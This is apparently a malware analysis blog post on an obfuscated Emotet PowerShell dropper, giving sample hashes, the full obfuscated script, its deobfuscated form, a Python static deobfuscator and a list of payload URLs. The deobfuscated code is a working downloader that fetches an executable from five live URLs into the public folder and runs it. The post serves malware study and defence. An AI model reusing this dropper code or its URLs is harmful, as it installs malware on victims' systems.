Obfuscated PowerShell Script 2 – Emotet

I found another obfuscated PowerShell script on Hybrid Analysis and tried to deobfuscate it:

https://www.hybrid-analysis.com/sample/458d7652e3d8c9f9ca8ab03a87dbec961c51d60d6d9d5f07e4d72bfd7a44a554?environmentId=100

MD5: 860d8897d99fe241b8a815ee45bdc618

SHA1: 0e6d2c43637aa56e6c3daa31844390451763d0a4

SHA256: c3772ca4c52135abc323bd543919e9f2724db47783fc43883054a01fdb507478

Here is the malicious PowerShell code:

 . iex "('(xCL.((gv GPRxCL+xCL*MDR*GPR).nAme[3,11,2]-JOInGPRGPR)((GPROx6nsGPRxCL+xCL+GxCL+xCLPRadasd = &(LfBnLGPR+GPRfB+LfGPR+'+'GPRBexCL+xCLLfB+GPR+G'+'PRLfBw-objGPR+GP'+'ReGPR'+'+G'+'PRcLxCL+xCLfB+LfBtLGPR+GPRfGPR+GPRB) rGPR+GPRandomxCL+xCL;Ox6GPR+GPxCL+xCL'+'RxCL+xCLYYU = .(LfBneLG'+'PR+GPRfB+LfxCL+xCLBxCL+xCLwLfB'+'+G'+'PR+GPRLfB-objectLfB) SysteGPR+GP'+'Rm'+'.Net.WebC'+'lieGPR+GPRxCL+xCLnt;Ox6NSBGPR+GPR = GPR+GPROx6nsGPR+GPRadasd.next(10000, 282133);Ox6GPR+GPRAGxCL+xCLPR+GPRDCX =GPR+GPR LfGPR+GPRB xCL+xCLh'+'tGPR+GPRtp://bergindeGPR+GPRpolder.nl/EAGPR+GPRQ6Y/?htGPR+GPRtps://spGPR+GPRortshuGPR+GPRb.oGPR+GPRutGPR+GPRcome.li'+'fe/r3AGPR+GPRDGPR+GPRM/?h'+'ttGPR+GPRp://GPR+'+'xCL+xCLGPRtransportadorGPR+GPRacGPR+GPRaribGPR+GPReensGPR+GPRueGPR+GPRno.com/qIPy/?http://GPR+GPRqualiG'+'PR+GPRtyhomesoGPR+GPRnline'+'.com/pV1pGPR+xCL+x'+'CLGPRfgF/GxCL+xC'+'LPRxCL+xCL+GxCL+xCLPR?httpsGPR+GPR://GPxCL+xCLR+GPRmxCL+xCLoGPR+GPRlecule-group.rxCL+xCLu/LfSL/LGPR+GPRfGPR+GPRBGPR+GPR.GPR+GPRSpGPR+GPRlit(LGPR+GP'+'RfB?GPR+GPRLfB)GPR+GPR;Ox6SDGPR+GPRCGPR+GPR = OGPR+GPRx6env:GPR+GPRpGPR+GPRublic + LGPR+GPRfBixFLfB + GPR+GPROxGPxCL+xCLR+G'+'PR6GPR+GPRNSB + GPxCL+xCLR+GPR'+'(LfB.eGPR+GPRxLfB+GPR+GPRLfGPR+GPRBeLfGPR+GPRB);foreacG'+'PR+GPRh(Ox6asfcGPR+GPR in OxGPR+GPR6ADCGPR+GPRX){try{Ox6YYU.mwGPR+GPxCL+xCLRSGPR+GPRDGPR+'+'GPRoxCL+xCLGPR+GPRKGPxCL+'+'xCLR+GPRCkWGPR+GPRnGPR+GPRlKC'+'kOadFGPR+GPRIKCkleGPR+GPRmwS(GPR+GPROx6GxCL+xCLPR+GPRasfxCL+xCLc.mwS'+'GPR+GxCL+xCLPRTGPR+GPRoGPR+GPR'+'StrKCkiKCkNGPR+GPRgmGPR+GPxCL+xCLRwS()GPR+GPR, 
Ox6SGPxCL+xCLR+GPRDxCL+xCLGPR+GPRC);&(G'+'PR+GPRLfBInxCL+xCLvoLxCL+xCLfB+'+'LfBGPR+GPRkxCL+xCLLfB+LfBe-IteGPR+GPRmLfB)(GPR+GPRxCL+xCLOx6SDC)GPR+GPR;break;}caGPR+GxCL+xCLPxCL+xCLRtGPR+xCL+xCLGPRc'+'GPxCL+xCLR+GPRh{}}GPR).repLAC'+'xCL+xCLe(GPRmwSGPR,['+'STRINgxCL+xCL][cHAxCL+xCLR]34).repLACe(([cHAR]79+['+'cH'+'AR]120+[cHAR]54),GPR1xCL+xCLs5GPR).repLACe(GPRLfBGPR,[STRINgxCL+xCL]['+'cHAR]39).repLACe(([cHAR'+']105+[cHAR]1xCL+xCL20+[xCL+xCLcHAR]70),[S'+'TRINg][cHAR]92).repLACe('+'([cHAR]75+[cHAR]67+[cHAR]107),[STRINg][cHAR]96) )xCL).REPlAce(([CHar]71+[CHar]80+[CHar]82),[sTRInG][CHar]39).REPlAce(([CHar]49+[CHar]115+[CHar]53),[sTRInG][CHar]36) Nrl . ( 9xfshEllid[1]+9xfS'+'HeLlid[1'+'3]+xCLxxCL)').RePlace(([ChAr]78+[ChAr]114+[ChAr]108),[STrinG][ChAr]124).RePlace(([ChAr]120+[ChAr]67+[ChAr]76),[STrinG][ChAr]39).RePlace('9xf',[STrinG][ChAr]36)| &( $pshoME[4]+$PShOMe[34]+'x')"

After substituting the strings with their corresponding replacements, I arrived at:


$nsadasd = &('n'+'e'+'w-objec'+'t') random;
$YYU =.('ne'+'w'+'-object') System.Net.WebClient;
$NSB = $nsadasd.next(10000, 282133);
$ADCX = ' http://bergindepolder.nl/EAQ6Y/?https://sportshub.outcome.life/r3ADM/?http://transportadoracaribeensueno.com/qIPy/?http://qualityhomesonline.com/pV1pfgF/?https://molecule-group.ru/LfSL/'.Split('?');
$SDC = $env:public +'\' + $NSB + ('.ex'+'e');
foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item')($SDC);break;}
catch{}}

This is very similar to the #emotet document I analyzed in Analyzing virus.office.qexvmc.
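The substitution step above can be done statically, without handing any layer to iex. The following Python is an added example (not from the original post): it finds the longest single-quoted concatenation in a layer, resolves the .Replace() arguments chained after it ([char] sums and literals), applies them in order, and repeats on the result for the next layer. The sample it works on is constructed here in the same scheme as the script above (token names xCL, Nrl, 1s5, LfB and Ox6 are taken from it); it assumes no '' escapes inside the quoted pieces and only [char]-sum or literal arguments.

```python
import re

# One .Replace() argument: a "(...)" char-sum group, a quoted literal, or a bare token.
ARG = r"\([^()]*\)|'[^']*'|[^,()\s][^,()]*"
CALL = re.compile(r"\.replace\(\s*(" + ARG + r")\s*,\s*(" + ARG + r")\s*\)", re.I)
# A single-quoted string built from pieces joined with '+' ('' escapes are not handled).
QUOTED_RUN = re.compile(r"'[^']*'(?:\s*\+\s*'[^']*')*")

# Constructed two-layer sample in the scheme of the Emotet script above: layer 1 restores
# xCL -> ', Nrl -> | and 1s5 -> $; the inner chain's '1s5' is split ('1'+'s5') and only reads '$' after layer 1.
SAMPLE = (
    "('(xCLOx6u = LfBa.exeLfB;&Ox6uxCL).repLACe(xCLLfBxCL,[STRINg][cHAR]39)"
    ".repLACe(([cHAR]79+[cHAR]120+[cHAR]54),xCL1'+'s5xCL) Nrl iex')"
    ".RePlace(([ChAr]120+[ChAr]67+[ChAr]76),[STrinG][ChAr]39)"
    ".RePlace(([ChAr]78+[ChAr]114+[ChAr]108),[STrinG][ChAr]124)"
    ".RePlace(([ChAr]49+[ChAr]115+[ChAr]53),[STrinG][ChAr]36) | iex"
)

def resolve_arg(arg):
    """Build the literal string PowerShell would pass to .Replace()."""
    arg = re.sub(r"^\s*\[string\]\s*", "", arg, flags=re.I).strip()
    if arg.startswith("(") and arg.endswith(")"):
        arg = arg[1:-1].strip()
    if arg.startswith("'") and arg.endswith("'"):
        return arg[1:-1]                              # quoted literal such as '9xf'
    codes = re.findall(r"\[char\]\s*(\d+)", arg, flags=re.I)
    if not codes:
        raise ValueError("unsupported .Replace() argument: " + arg)
    return "".join(chr(int(c)) for c in codes)        # [char]78+[char]114+[char]108 -> Nrl

def unwrap_layer(code):
    """Statically apply the .Replace() chain that follows the longest string literal."""
    run = max(QUOTED_RUN.finditer(code), key=lambda m: len(m.group()), default=None)
    if run is None:
        return code, []
    subs = [(resolve_arg(m.group(1)), resolve_arg(m.group(2)))
            for m in CALL.finditer(code, run.end())]
    if not subs:
        return code, []
    payload = "".join(re.findall(r"'([^']*)'", run.group()))   # concatenate the pieces
    for old, new in subs:
        payload = payload.replace(old, new)   # String.Replace is case-sensitive, as in .NET
    return payload, subs

def unwrap_all(code, max_layers=10):
    for _ in range(max_layers):               # peel layers until no chain is left
        code, subs = unwrap_layer(code)
        if not subs:
            break
    return code
```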

The malicious script downloads its payload from the following URLs (trying each in turn until one succeeds):

hxxp://bergindepolder.nl/EAQ6Y/

hxxps://sportshub.outcome.life/r3ADM/

hxxp://transportadoracaribeensueno.com/qIPy/

hxxp://qualityhomesonline.com/pV1pfgF/

hxxps://molecule-group.ru/LfSL/

 
